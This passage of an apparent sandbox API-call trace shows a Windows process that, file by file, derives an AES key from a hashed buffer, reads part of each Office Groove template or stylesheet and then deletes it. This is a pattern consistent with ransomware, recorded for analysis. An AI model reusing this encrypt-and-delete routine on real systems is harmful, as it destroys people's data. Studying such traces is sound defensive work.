phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.510] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.510] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.510] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.510] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x314 [0168.510] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.521] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.522] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.522] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagestyle.css")) returned 1 [0168.525] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.526] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.526] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.526] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.526] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7f0 [0168.526] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.532] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.532] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.532] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.534] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsimagetemplate.html")) returned 1 [0168.536] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.536] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.536] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.536] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.536] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x858 [0168.536] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.543] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.543] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.543] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.545] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsmacrotemplate.html")) returned 1 [0168.547] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.547] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.547] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.547] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.547] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x46a3 [0168.547] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.698] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.698] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.698] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.700] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formspreviewtemplate.html")) returned 1 [0168.702] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.703] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.703] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.703] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.703] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x612 [0168.703] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.719] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.719] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.720] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsprinttemplate.html")) returned 1 [0168.809] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0168.832] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0168.833] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0168.833] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.833] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0168.833] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x75f [0168.833] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0168.845] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0168.845] CryptDestroyKey (hKey=0x284d628) returned 1 [0168.845] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Adobe.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\adobe.css")) returned 1 [0168.848] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0168.848] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0168.849] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0168.849] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.849] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0168.849] GetFileSize (in: hFile=0x514, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdf0 [0168.850] ReadFile (in: hFile=0x514, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0168.852] CryptDestroyHash (hHash=0x284d668) returned 1 [0168.853] CryptDestroyKey (hKey=0x284d628) returned 1 [0168.853] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\americana.css")) returned 1 [0168.856] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0168.872] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0168.873] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0168.873] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.873] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0168.873] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x100d [0168.873] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0168.889] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0168.889] CryptDestroyKey (hKey=0x284d628) returned 1 [0168.889] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.890] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue.css")) returned 1 [0168.891] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0168.892] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0168.892] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0168.892] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.892] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0168.892] GetFileSize (in: hFile=0x514, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1103 [0168.892] ReadFile (in: hFile=0x514, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0168.907] CryptDestroyHash (hHash=0x284d668) returned 1 [0168.907] CryptDestroyKey (hKey=0x284d628) returned 1 [0168.907] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\biscay.css")) returned 1 [0168.911] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0168.934] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0168.934] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0168.934] CryptHashData (hHash=0x284d628, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.934] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d668) returned 1 [0168.935] GetFileSize (in: hFile=0x514, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x143 [0168.935] ReadFile (in: hFile=0x514, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0168.936] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.936] CryptDestroyKey (hKey=0x284d668) returned 1 [0168.936] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.937] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\background.gif")) returned 1 [0168.938] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0168.939] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0168.939] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.939] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0168.939] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10f1 [0168.939] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0168.964] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0168.964] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0168.964] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.965] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange.css")) returned 1 [0168.967] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0168.967] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0168.968] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0168.968] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.968] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0168.968] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1074 [0168.968] ReadFile (in: hFile=0x518, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.007] CryptDestroyHash (hHash=0x284d668) returned 1 [0169.007] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.007] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.009] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow.css")) returned 1 [0169.011] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.011] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.011] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.011] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.011] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x760 [0169.011] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.015] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0169.015] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.015] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.017] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Casual.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\casual.css")) returned 1 [0169.018] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.019] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.019] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.019] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.019] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x731 [0169.019] ReadFile (in: hFile=0x518, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.034] CryptDestroyHash (hHash=0x284d668) returned 1 [0169.034] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.034] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.035] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Country.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\country.css")) returned 1 [0169.037] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0169.037] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.038] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.038] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.038] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.038] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd35 [0169.038] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.139] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0169.139] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.140] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert.css")) returned 1 [0169.144] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.145] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.145] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.145] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.145] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x72e [0169.145] ReadFile (in: hFile=0x518, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.172] CryptDestroyHash (hHash=0x284d668) returned 1 [0169.172] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.172] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.174] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Earthy.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\earthy.css")) returned 1 [0169.176] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0169.176] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.177] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.177] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.177] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.177] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeb0 [0169.177] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.189] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0169.189] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.189] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck.css")) returned 1 [0169.193] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.193] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.193] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.193] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.193] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x762 [0169.193] ReadFile (in: hFile=0x518, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.196] CryptDestroyHash 